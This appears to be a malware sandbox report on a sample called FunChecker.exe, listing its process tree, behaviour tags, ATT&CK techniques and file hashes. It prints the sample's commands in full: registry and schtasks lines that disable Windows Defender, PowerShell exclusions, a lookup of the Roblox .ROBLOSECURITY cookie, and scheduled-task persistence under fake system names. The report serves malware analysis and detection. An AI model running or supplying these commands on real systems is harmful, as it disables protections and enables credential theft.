cmd.exe 101 PID 3684 wrote to memory of 2760 3684 cmd.exe 101 PID 3684 wrote to memory of 2108 3684 cmd.exe 102 PID 3684 wrote to memory of 2108 3684 cmd.exe 102 PID 3684 wrote to memory of 4116 3684 cmd.exe 103 PID 3684 wrote to memory of 4116 3684 cmd.exe 103 PID 3684 wrote to memory of 4668 3684 cmd.exe 104 PID 3684 wrote to memory of 4668 3684 cmd.exe 104 PID 3684 wrote to memory of 3080 3684 cmd.exe 105 PID 3684 wrote to memory of 3080 3684 cmd.exe 105 PID 3684 wrote to memory of 2440 3684 cmd.exe 106 PID 3684 wrote to memory of 2440 3684 cmd.exe 106 PID 3684 wrote to memory of 4080 3684 cmd.exe 107 PID 3684 wrote to memory of 4080 3684 cmd.exe 107 PID 3684 wrote to memory of 488 3684 cmd.exe 108 PID 3684 wrote to memory of 488 3684 cmd.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:600
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:2172
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:3348
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4868
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:424
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2972
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:508
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2216
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:1936
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:4404
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:524
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2760
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2108
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:4116
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:4668
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:3080
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:2440
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:4080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:488
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:3408
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:404
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:2096
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:2420
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4672
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4980
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2104
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:2348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat" "2⤵PID:2332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2968
-
-
-
C:\Users\Admin\AppData\Local\Temp\system32.exe"C:\Users\Admin\AppData\Local\Temp\system32.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:4176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4116
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:664
-
-
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunCheker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunCheker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunCheker" /tr "C:\Users\Admin\AppData\Roaming\FunCheker.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3684
-
-
C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe"C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4424 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "HPN42SDD8UHTLWI" /tr "C:\Users\Admin\AppData\Roaming\HPN42SDD8UHTLWI.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe"C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe"3⤵
- Executes dropped EXE
- Modifies registry class
PID:4912 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"4⤵PID:3876
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "5⤵PID:3684
-
C:\HypercomponentCommon\hyperSurrogateagentCrt.exe"C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
PID:664 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kleghtlu\kleghtlu.cmdline"7⤵PID:4680
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71D0.tmp" "c:\Users\Admin\AppData\Roaming\CSCF6D6BC8FAF0144D5922F1843B23DA98E.TMP"8⤵PID:4520
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ilftiht0\ilftiht0.cmdline"7⤵
- Drops file in System32 directory
PID:4484 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES721E.tmp" "c:\Windows\System32\CSC9F2BFC5A824449828879E6BA61F831F8.TMP"8⤵PID:4956
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\WmiPrvSE.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\InstallAgent.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\lsass.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\31rB2fmfHH.bat"7⤵PID:3180
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3408
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:1940
-
-
C:\Recovery\WindowsRE\dwm.exe"C:\Recovery\WindowsRE\dwm.exe"8⤵
- Executes dropped EXE
PID:2044
-
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 13 /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 10 /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 14 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 5 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4444
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
220B
MD547085bdd4e3087465355c9bb9bbc6005
SHA1bf0c5b11c20beca45cc9d4298f2a11a16c793a61
SHA25680577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752
SHA512e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684
-
Filesize
105B
MD55ee2935a1949f69f67601f7375b3e8a3
SHA16a3229f18db384e57435bd3308298da56aa8c404
SHA256c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06
SHA5129777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a
-
Filesize
1.9MB
MD57be5cea1c84ad0b2a6d2e5b6292c8d80
SHA1631e3de0fe83ebacbe5be4e7f895dd0bd8b095ce
SHA2566eb90684ebc56fb2713f5c468b55a964625ec2af698d9687492b1de4225693b7
SHA512ea58d3b1664fe70968635c2722e19ce65ce4c1d66c68aed2d98441e60e773c7295f18d9c99cf4c454c510f33f5e37d3d2c0053b7434a46c542a0d63a4cc03647
-
Filesize
16B
MD514c709cc22e8c1a80f9d4375234a594b
SHA1960a6ffb980476ae48eae378912f193fd64cecbb
SHA256dc67cf8499ad8b4bbc53649a62b144eea07d3e288de9bd4f2f8fa7b6777ee256
SHA51249637ce4eb4412b5aa8ac94bf29d130ac9d5d8c20554dd559e47a2d1afd9bf13d9d59e7a5ae52d729c4add79cc72b6c03f50c998dcc61eb6c0482d1b9d4bb688
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
2KB
MD52c59a3c90f0c16d346f8c4f4df64a6c6
SHA1324099be473da754fe733c61e2e536e550f1d45c
SHA25617da3cfdee18f36a8ed7f5213e0829096fffc6546555ec381e06ada83388beb0
SHA51231d54490518b88d44ec2916a1571a21b8a9db0bfc7e680cfc492c942cf81b58c32be929acfd30e14bd0b85e131d752f3c3a695a62bc5e002f761f3c8e0f1df7a
-
Filesize
18KB
MD5ae8991710860c8b00be1fcd68d547af3
SHA147fd00b85575b41b85c320c07264d3e8e633c77a
SHA25651baa2b91bd904001767a453a311292a9f8ccfea9fc2a7269bb5d6a60e2718d8
SHA51262286172c1484909793b464ef58232f7bc7c0f22d46841385a94bd9c66095449aaf5124cc2a767a73decb70099d128574ac940ad7cc094cce44ec875f52b3d30
-
Filesize
18KB
MD52cf01657c5ac27eefa6b3ff4e35a1a50
SHA1584fa6162040238a9d8453d1a4918ebe1554d017
SHA256a39ea6c97f8ae7ae41b4e9d83e157272ec8af818545e11c20874461d60c505e3
SHA5120c3a5abb0d3d3e6efc65107eae636473160ad45209e09d7c0ec53c1d5d8547322ddc04b12a12ef3a2bb51436ccec2280f15ec854f49e2b48c99ebef7cd8965df
-
Filesize
18KB
MD5f7ea30d73e4d35c4935deda299f2d925
SHA1aac6976e4536461524cff5dcdd6dd4d6d7e52b99
SHA256e50aa0aaf00a10a794501ba32af98dab0dc31ce3f355d745d269f10e4779d177
SHA5129c1b6a2e2f5bc29b45e2b6913085ac60907ab718486148a9d5610bedf4bb4dfa0aff3eced0247f83b2fd5015ba84db7b86b6b553703ba43f14341ef07626f5f7
-
Filesize
18KB
MD51509353d6b4376f57775e46c90c8d6b8
SHA1de1394d6aecb38616999659259e207d089e98372
SHA2568b51849411465e45a663eb9a84d3d2bcfd0a344fa6509672500291a5ecf3008b
SHA512df4b7adb24ff38b11f80587f05bbf9d0aff0dc940b93de02ef22f924b6b4f62ccd809c8ed8a60007aeb3057525d5ebf63f6652a1ddd29403f79a6b83e0287dc0
-
Filesize
18KB
MD505575f9847eab32a3ae3a2a5dc78ec64
SHA18598c7e28d3daaef3a737dbe2585ee9e61db0541
SHA2565454f7eccff362c9bfb12516b89c100881b37a2adbcf6141c836545612406439
